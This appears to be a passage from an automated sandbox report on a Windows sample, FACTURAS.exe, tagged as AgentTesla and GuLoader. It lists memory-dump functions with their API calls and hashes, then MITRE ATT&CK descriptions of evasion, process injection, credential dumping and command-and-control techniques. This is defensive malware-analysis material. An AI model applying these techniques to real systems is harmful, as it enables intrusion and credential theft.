Function 1E01A144, Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 1E01B4E1

Memory Dump Source

Source File: 00000005.00000002.29215241219.000000001E010000.00000040.00000001.sdmp, Offset: 1E010000, based on PE: false

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 81ca030f6011e23f200afa23c56b1fe299ed7b85a4c8cffd49359efa0b098794
Instruction ID: 3b1dba1076f8b6969caf353ee5de546ae87f26c36afe665f5d4eb6acfe8e81dc
Opcode Fuzzy Hash: 81ca030f6011e23f200afa23c56b1fe299ed7b85a4c8cffd49359efa0b098794
Instruction Fuzzy Hash: 354106B4A00649DFCB14CF99C484AAABBF5FF88314F24C959D51AAB321D774E941CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 017391B4, Relevance: 1.6, APIs: 1, Instructions: 90registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 01739279

Memory Dump Source

Source File: 00000005.00000002.29206611401.0000000001730000.00000040.00000010.sdmp, Offset: 01730000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 397fada4f7a5ad1c507319abd47e57b1902af4f63d2151f086f3edd86daf9cb8
Instruction ID: c8095c84d915c61d8454442d4d934bb5782489911cf4259c03d3ce1429d82b22
Opcode Fuzzy Hash: 397fada4f7a5ad1c507319abd47e57b1902af4f63d2151f086f3edd86daf9cb8
Instruction Fuzzy Hash: 8F41DFB1D046589FCB10CFAAC980ADEFFF5BF88314F15846AE918AB211D7749905CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01738844, Relevance: 1.6, APIs: 1, Instructions: 88registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 01739279

Memory Dump Source

Source File: 00000005.00000002.29206611401.0000000001730000.00000040.00000010.sdmp, Offset: 01730000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: ba0f6f1e8f95e5de82b2014a5a1e89491f908fe969c73b0e0bfa09239ae39423
Instruction ID: 6eb5c24640ad77d25f55f62ef19b16b08ec41aeb5ac1471ea16a8eb7fb5b9ffe
Opcode Fuzzy Hash: ba0f6f1e8f95e5de82b2014a5a1e89491f908fe969c73b0e0bfa09239ae39423
Instruction Fuzzy Hash: 4331DEB1D046589FCB10CF9AC984A9EFBF5BF88714F14802AE918AB311D7709905CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 01738838, Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 0173900C

Memory Dump Source

Source File: 00000005.00000002.29206611401.0000000001730000.00000040.00000010.sdmp, Offset: 01730000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 44d65701dc3f54b66c40b8692266d64bf431207aff145d3e6675e39e61e742f9
Instruction ID: 3897fd8df898fe715e12548156555375ebc1b6bc84971a38d8c0d8ef464f266e
Opcode Fuzzy Hash: 44d65701dc3f54b66c40b8692266d64bf431207aff145d3e6675e39e61e742f9
Instruction Fuzzy Hash: E23112B0D042499FDB10CF99C584A8EFFF5BF88304F24856AE508AB342C7B59945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1E01A54A, Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1E01A5D7

Memory Dump Source

Source File: 00000005.00000002.29215241219.000000001E010000.00000040.00000001.sdmp, Offset: 1E010000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 0cb618b21cde73f769f7b9ea3652caa8494bf291d2675c67304ce9de64a353f5
Instruction ID: 1948f7e786b66fefecfbbd8c7f31dfd7d69c312f5bc643f4a5f466cfa669862c
Opcode Fuzzy Hash: 0cb618b21cde73f769f7b9ea3652caa8494bf291d2675c67304ce9de64a353f5
Instruction Fuzzy Hash: D221F2B59002489FDB10CFAAD984AEEFFF4EF48320F14851AE955A7351D374AA44CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 1E01A550, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1E01A5D7

Memory Dump Source

Source File: 00000005.00000002.29215241219.000000001E010000.00000040.00000001.sdmp, Offset: 1E010000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 6bd777da03edc69e89635981735bd8a46c271e044d4739a72bf7c1084060f91d
Instruction ID: 23a4d337c5d388d194d5d209d3f36aaa0d71b9d33a036ad6c581567e4b3a57ac
Opcode Fuzzy Hash: 6bd777da03edc69e89635981735bd8a46c271e044d4739a72bf7c1084060f91d
Instruction Fuzzy Hash: D021E4B5900248DFDB10CFAAD980ADEFBF9EF48320F10841AE914A7311D374AA40CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0173E1C0, Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

FindWindowW.USER32(00000000,00000000), ref: 0173F9D6

Memory Dump Source

Source File: 00000005.00000002.29206611401.0000000001730000.00000040.00000010.sdmp, Offset: 01730000, based on PE: false

Similarity

API ID: FindWindow
String ID:
API String ID: 134000473-0
Opcode ID: 9229be62b1af89f67c114da36521d95c7040701f2add084fd1f88f40add97b5b
Instruction ID: 185be46d47038f5fa4ca0c8a0a94669f302319d16138b9474407d7c2eb4e1005
Opcode Fuzzy Hash: 9229be62b1af89f67c114da36521d95c7040701f2add084fd1f88f40add97b5b
Instruction Fuzzy Hash: 932110B5D002099FDB14CF9AD884AEEFBB4BB89210F10856ED559B7701C374A944CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0173F958, Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

FindWindowW.USER32(00000000,00000000), ref: 0173F9D6

Memory Dump Source

Source File: 00000005.00000002.29206611401.0000000001730000.00000040.00000010.sdmp, Offset: 01730000, based on PE: false

Similarity

API ID: FindWindow
String ID:
API String ID: 134000473-0
Opcode ID: 0fce4bc18e439fdfdfaa7e56285b54a07c1bc59a536b2b560665ab44ee1a1041
Instruction ID: 97fa2cfd04d61d80fd71e95a3839821badfb16a2a2f5f3ccd02116b51cfa07ae
Opcode Fuzzy Hash: 0fce4bc18e439fdfdfaa7e56285b54a07c1bc59a536b2b560665ab44ee1a1041
Instruction Fuzzy Hash: D4211EB6D002099FDB14CF9AD884AEEFBB4BF89320F50852ED459B7701D374A944CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0173A100, Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,0173A082), ref: 0173A16F

Memory Dump Source

Source File: 00000005.00000002.29206611401.0000000001730000.00000040.00000010.sdmp, Offset: 01730000, based on PE: false

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: bcd1cf3f757307009b163f213eefa510e30cbda39db7443e92a1f3c5dd74ae90
Instruction ID: a03397b71fa9e8ab45a981badc8b1551140dddc6c359333c86abd2e3f02a1105
Opcode Fuzzy Hash: bcd1cf3f757307009b163f213eefa510e30cbda39db7443e92a1f3c5dd74ae90
Instruction Fuzzy Hash: 1E1133B1D006199FCB10CFA9D4457EEFBB4AF88320F10852AD814B7641E378AA41CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01738A2C, Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,0173A082), ref: 0173A16F

Memory Dump Source

Source File: 00000005.00000002.29206611401.0000000001730000.00000040.00000010.sdmp, Offset: 01730000, based on PE: false

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 8b886ad01110065ac6c6f7bd891a41c62417e32e6b8e4f05bf655f180156edf7
Instruction ID: 841e5b9d07466e57eda98b596af611534dca36ae3de954b16dc7dd2d00ae0672
Opcode Fuzzy Hash: 8b886ad01110065ac6c6f7bd891a41c62417e32e6b8e4f05bf655f180156edf7
Instruction Fuzzy Hash: 5A1103B1D046599FCB10CF9AC4457EEFBF8AF88220F10856AD918B7241D778A941CFE1

Uniqueness

Uniqueness Score: -1.00%

Function 00DB27B1, Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,00000000,?,00DB2791,00000800), ref: 00DB2822

Memory Dump Source

Source File: 00000005.00000002.29202960633.0000000000DB0000.00000040.00000010.sdmp, Offset: 00DB0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 4fa4346eab991c436a80458a2d0fb6418e973a0e4d6b74b9be3bbbd91dc97da4
Instruction ID: e7cc3c743b5ecefeadfa48c18364ae06919b14a9c43c98023ebb764965b42acb
Opcode Fuzzy Hash: 4fa4346eab991c436a80458a2d0fb6418e973a0e4d6b74b9be3bbbd91dc97da4
Instruction Fuzzy Hash: 5D11D3B69002499FCB10CF9AD844AEEFBF9AF88714F14842AE519A7600C775A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01117BE3, Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(E9CCB547,-54F204F5), ref: 01117BEF

Memory Dump Source

Source File: 00000005.00000002.29203731039.0000000001117000.00000040.00000001.sdmp, Offset: 01117000, based on PE: false

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 78695a82c590cf974435e5033171911ef61e068c1bdfce24e53030bedae90133
Instruction ID: 2cf2b5d20e574f8904a2040997b342001b5caf93ae029c415eb630a6203c8a3e
Opcode Fuzzy Hash: 78695a82c590cf974435e5033171911ef61e068c1bdfce24e53030bedae90133
Instruction Fuzzy Hash: 6D11827050A625CEDF3D8B18C4D8B61B7E2AB01215F8992B9C4864B2EBC775DCC6CB81

Uniqueness

Uniqueness Score: -1.00%

Function 1E0137C8, Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 1E0153B6

Memory Dump Source

Source File: 00000005.00000002.29215241219.000000001E010000.00000040.00000001.sdmp, Offset: 1E010000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 09b185e4b772ec57792c1edb44f6d97c238930af83828553701673713743a511
Instruction ID: e1539d6d341eb5e02fc9ad422e7546aaf5082acf60b4fa02cb2d4c64077cd32c
Opcode Fuzzy Hash: 09b185e4b772ec57792c1edb44f6d97c238930af83828553701673713743a511
Instruction Fuzzy Hash: 3C111FB19006498FCB10CF9AD440A9EFBF4AB88210F14852AD919BB700D3B5A541CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00DB58F8, Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00DB67C5

Memory Dump Source

Source File: 00000005.00000002.29202960633.0000000000DB0000.00000040.00000010.sdmp, Offset: 00DB0000, based on PE: false

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: d36d9f2b63d132d73ce12414ee1c1fb157fc0541a7ab66ce590954f5dcc0cb15
Instruction ID: 6801953eddce18a4e2c23e37a516d1da14fe95937352dd5acfb922943ed96fe2
Opcode Fuzzy Hash: d36d9f2b63d132d73ce12414ee1c1fb157fc0541a7ab66ce590954f5dcc0cb15
Instruction Fuzzy Hash: 4F1106B1900648DFCB10CF9AD544BDEBBF4AB48724F108859D519A7701D778A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00DB6768, Relevance: 1.5, APIs: 1, Instructions: 45comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00DB67C5

Memory Dump Source

Source File: 00000005.00000002.29202960633.0000000000DB0000.00000040.00000010.sdmp, Offset: 00DB0000, based on PE: false

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 32c52ed3c8c553db13120b2101f71873df178505ac7b4dd61c80265dc0643604
Instruction ID: d6e14305e0aa955cb0ad3e2fbd7c7fb0d8befee881769f115d14908b445c00c0
Opcode Fuzzy Hash: 32c52ed3c8c553db13120b2101f71873df178505ac7b4dd61c80265dc0643604
Instruction Fuzzy Hash: 261103B5900649CFCB10CFA9D545BDEBBF4AF48324F108859D518A7B11D778A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 1DF9D3D8, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.29214682573.000000001DF9D000.00000040.00000001.sdmp, Offset: 1DF9D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c85150ad7b10d701602df19d16ad75cbe0213d5764046ace224a641ea73aa28e
Instruction ID: b58725105c2b245dd85d963a37723ea7f2a5f43d654ef359f6719749b8d257ad
Opcode Fuzzy Hash: c85150ad7b10d701602df19d16ad75cbe0213d5764046ace224a641ea73aa28e
Instruction Fuzzy Hash: 0221F471904240DFEB09DF5CDDC0B56BB65FB84724F30C569E9090B286C336E656CAB2

Uniqueness

Uniqueness Score: -1.00%

Function 1DFAD01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.29214796448.000000001DFAD000.00000040.00000001.sdmp, Offset: 1DFAD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfe8a441c3a5801253504d38ac804f1497f10badbff6921b242c90b87c7a29e3
Instruction ID: 2ba4fd78b0c4dbbfd6dcac95cd0ca02ed65c85bca9c1e073a5e1555c6d8ab694
Opcode Fuzzy Hash: cfe8a441c3a5801253504d38ac804f1497f10badbff6921b242c90b87c7a29e3
Instruction Fuzzy Hash: F7212271604240DFCB05CF6CDD80B16BB65FB88714F28C969D8094B28AE337D946CA72

Uniqueness

Uniqueness Score: -1.00%

Function 1DFAD005, Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.29214796448.000000001DFAD000.00000040.00000001.sdmp, Offset: 1DFAD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0465d8d12696ae6633b734eb76da88e6b481732a02b31ea29468c49f2a6f2ae
Instruction ID: 403943f909d7d43fdca4e1388e898e2768459ef83c2f2c9af4abbb8472f23845
Opcode Fuzzy Hash: c0465d8d12696ae6633b734eb76da88e6b481732a02b31ea29468c49f2a6f2ae
Instruction Fuzzy Hash: 53216F755087809FC702CF28D994B11BF71EB46314F28C5AAD8498F296D33AD95ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 1DF9D3D3, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.29214682573.000000001DF9D000.00000040.00000001.sdmp, Offset: 1DF9D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a53465bc4b76f921cb7aa1bd46d1dcbc41ccc19bc46c20a37bfdf29aa337da5
Instruction ID: 3f65361ad69f7947b7da30ede0c8b78b5bd8ca95ddb68d9863f655c304157c9b
Opcode Fuzzy Hash: 1a53465bc4b76f921cb7aa1bd46d1dcbc41ccc19bc46c20a37bfdf29aa337da5
Instruction Fuzzy Hash: A311D675904280DFDB05CF18D9C0B16BF71FB84324F34C5A9E9090B656C33AE556CBA2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0104EA80, Relevance: .2, Instructions: 196COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.29203229128.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13bb96de1c7d95b80ad6ad0b36429c906700804f86bd68d01e1e7a290a0bd10b
Instruction ID: 6003b886871f01bd8ef2c34da3ddcb87f1088997fd8736aa4dc5ebc0d6bed26d
Opcode Fuzzy Hash: 13bb96de1c7d95b80ad6ad0b36429c906700804f86bd68d01e1e7a290a0bd10b
Instruction Fuzzy Hash: 72519F707086108FDB595B79C8E863E3AD6AFC564530984B9E647CB3A1DF2CCC02D7A1

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report FACTURAS.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Agenttesla

Threatname: GuLoader

Yara Overview

Memory Dumps

Sigma Overview

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Networking:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre